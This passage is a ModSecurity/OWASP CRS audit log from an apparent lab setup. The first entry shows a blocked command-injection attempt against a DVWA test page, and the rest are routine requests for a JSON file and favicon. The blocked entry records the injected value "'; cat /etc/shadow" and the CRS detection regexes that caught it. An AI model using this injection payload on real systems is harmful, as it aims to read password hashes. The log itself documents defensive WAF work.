\"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip:  cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip:  cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":486,"p2":2650,"p3":0,"p4":0,"p5":359,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A0AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:35:49 GMT","If-None-Match":"\"65-54f67e66856bf\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:57:53 GMT","ETag":"\"15a-54f683559a2e3\"","Accept-Ranges":"bytes","Content-Length":"346","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A0AAAAE\"]"],"stopwatch":{"p1":727,"p2":1780,"p3":91,"p4":222,"p5":80,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A4AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A4AAAAE\"]"],"stopwatch":{"p1":612,"p2":1575,"p3":80,"p4":401,"p5":150,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A8AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A8AAAAE\"]"],"stopwatch":{"p1":629,"p2":1438,"p3":69,"p4":2691,"p5":150,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4UAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 14:33:54 GMT","ETag":"\"107-54f68b61bec0e\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcZVX8AAQEAAAkVV4UAAAAA\"]"],"stopwatch":{"p1":935,"p2":1365,"p3":65,"p4":148,"p5":56,"sr":50,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4YAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZVX8AAQEAAAkVV4YAAAAA\"]"],"stopwatch":{"p1":589,"p2":1405,"p3":66,"p4":481,"p5":89,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4cAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZVX8AAQEAAAkVV4cAAAAA\"]"],"stopwatch":{"p1":470,"p2":863,"p3":46,"p4":245,"p5":160,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJAAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:57:53 GMT","If-None-Match":"\"15a-54f683559a2e3\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 14:34:24 GMT","ETag":"\"15a-54f68b7e775af\"","Accept-Ranges":"bytes","Content-Length":"346","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag 